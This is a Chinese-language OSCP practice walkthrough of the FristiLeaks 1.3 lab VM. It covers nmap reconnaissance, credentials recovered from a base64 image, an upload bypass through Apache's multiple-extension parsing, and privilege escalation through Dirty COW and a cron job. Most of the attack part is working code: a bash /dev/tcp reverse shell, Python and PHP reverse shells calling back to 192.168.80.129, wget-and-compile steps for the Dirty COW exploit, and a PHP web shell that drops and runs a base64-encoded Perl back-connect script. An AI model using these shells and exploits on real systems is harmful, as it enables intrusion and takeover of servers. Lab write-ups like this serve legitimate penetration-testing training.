FristiLeaks_1.

3
oscp 备考，oscp系列——FristiLeaks_1.3靶场
FristiLeaks_1.3难度为简单靶场

考察信息收集，有点ctf的味道，通过提示最后发现upload上传地点
使用Apache解析漏洞，绕过白名单限制
最后牛脏提权
下载地址：
https://pan.quark.cn/s/26e1cb6958fc

nmap
主机发现
└─# nmap -sn 192.168.80.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:22 CST
Nmap scan report for 192.168.80.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.80.2
Host is up (0.00030s latency).
MAC Address: 00:50:56:E1:35:E6 (VMware)
Nmap scan report for 192.168.80.131
Host is up (0.00052s latency).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.80.254
Host is up (0.00033s latency).
MAC Address: 00:50:56:FF:44:91 (VMware)
Nmap scan report for 192.168.80.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 25.04 seconds

端口扫描
进行了两次扫描，发现只有80端口
㉿
┌──(root kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 10000 -p- 192.168.80.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:25 CST
Nmap scan report for 192.168.80.131
Host is up (0.00085s latency).
Not shown: 65515 filtered tcp ports (no-response), 19 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 23.66 seconds

㉿
┌──(root kali)-[/home/kali/桌面/nmap]
└─# nmap --min-rate 5000 -p- 192.168.80.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:28 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).
Not shown: 65502 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.53 seconds

详细端口扫描
└─# nmap -sV -sC -sT -O -p80 192.168.80.131 -oA fl1.3/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:45 CST
Nmap scan report for 192.168.80.131
Host is up (0.0014s latency).

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
| http-methods:
|_ Potentially risky methods: TRACE
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1
closed port
Device type: general purpose|storage-misc|media device|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Drobo embedded (89%), Synology
DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 3.13 (97%), Linux 2.6.39
(94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8
 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds

vuln扫描
└─# nmap --script=vuln -p80 192.168.80.131 -oA fl1.3/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 09:47 CST
Nmap scan report for 192.168.80.131
Host is up (0.00087s latency).

PORT STATE SERVICE

80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
| /robots.txt: Robots file
| /icons/: Potentially interesting folder w/ directory listing
|_ /images/: Potentially interesting folder w/ directory listing
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.07 seconds

目录扫描
nmap 和目录扫描，得到了
/robots.txt
/icons/
/images/

80
robots.txt
发现三个目录进去看看
Disallow: /cola
Disallow: /sisi
Disallow: /beer
得到了images文件夹有目录遍历，没什么用

其他两个指向和/cola一样

/icons 目录
进入看看，也是目录遍历，但是全是图片，没有什么东西
对他单独进行目录扫描试试，也全部都是图片
提示信息
发现不对，尝试小写：fristi，成功访问
文件上传漏洞
通过提示登录
进入之后，顺便尝试了一下弱口令和sql注入，发现没有
查看源码，发现有提示
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
 CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

base64 解密，发现是图片
得到
keKkeKKeKKeKkEkkEk

通过这两个
eezeepz
keKkeKKeKKeKkEkkEk
猜测应该是账号和密码
成功登录

发现文件上传

文件上传
进行文件上传，发现是白名单

查看一下php版本和中间件
发现可以尝试：%00截断和Apache解析漏洞
%00截断

1. PHP版本小于5.3.4
2. php.ini中的magic_quotes_gpc设置为Off

Apache 解析漏洞
Apache 在1.x和2.x版本中存在解析漏洞
例如如下地址格式：
www.xxxx.com/apache.php.bbb.aaa
 从右至左开始判断后缀，若aaa非可识别后缀，再判断bbb，直到找到可识别后缀为止，然后将该可识
Apache
别后缀进解析，因此如上地址解析为访问apache.php文件
尝试%00截断漏洞，失败

尝试低Apache解析漏洞，成功
蚁剑连接+反弹shell
反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.80.129/7777 <&1'

方法一，牛脏提权
查看内核版本

Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64

可以尝试牛脏提权
wget http://192.168.80.129/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty 123456
可以发现已经成了，直接使用 su 命令切换用户
bash-4.1$ su firefart
su firefart
Password: 123456

[firefart@localhost tmp]# id
id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@localhost tmp]#
方法二，根据题目提示，sudo提权
来到home目录，发现我们登录的用户eezeepz
进入查看，发现一个.txt文件，查看发现提示
 Yo EZ,

I made it possible for you to do some automated checks,

but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry
哟EZ，
我让你可以做一些自动检查，
但我只允许您访问/usr/bin/*系统二进制文件。我做的
但是，将一些额外的常用命令复制到我的
主页目录：chmod、df、cat、echo、ps、grep、egrep，这样你就可以使用它们了
from/home/admin/
别忘了为每个二进制文件指定完整路径！
只需在/tmp/中放置一个名为“runthis”的文件，每行一个命令。这个
输出转到/tmp/中的文件“cronresult”。它应该
以我的帐户权限运行每一分钟。
-杰瑞

大概意思就是，我们在/tmp/目录下面创建一个runthis文件，admin用户会每隔一分钟允许里面的命令，可以使
用反弹shell
不过只能使用/usr/bin目录下面的命令，我们先看看有那些可以利用的，发现有python和php都可以利用
<?php
$sock=fsockopen(getenv("192.168.80.129"),getenv("6666"));
exec("/bin/sh -i <&3 >&3 2>&3");
?>
创建shell.py文件，通过wget上传到靶机
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.80.129",6666));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")

然后写入命令，等待一分钟反弹shell
echo "/usr/bin/python /tmp/shell.py" > runthis

成功之后得到下一步提示
发现加密脚本和加密字符
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
加密字符
[admin@localhost ~]$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
[admin@localhost ~]$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

通过加密脚本，逆推出解密脚本
#decoderot13.py
import base64,codecs,sys

def decodeString(str):
base64string= codecs.decode(str,'rot13')
return base64.b64decode(base64string[::-1])

cryptoResult=decodeString(sys.argv[1])
print cryptoResult

解密
mVGZ3O3omkJLmy2pcuTq : thisisalsopw123
=RFn0AKnlMHMPIzpyuTI0ITG : LetThereBeFristi!

猜测是fristigod的密码
su fristigod

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')) {
 $res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2V
jaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNC
iRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8
IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkV
BTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcG
VuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc
3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>